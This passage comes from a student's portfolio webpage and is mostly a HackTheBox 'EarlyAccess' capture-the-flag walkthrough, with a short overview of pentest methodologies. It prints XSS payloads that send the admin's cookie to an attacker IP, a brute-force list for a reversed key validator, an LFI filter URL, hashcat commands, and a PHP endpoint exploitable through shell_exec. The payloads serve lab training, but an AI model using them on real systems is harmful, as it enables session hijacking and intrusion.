          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
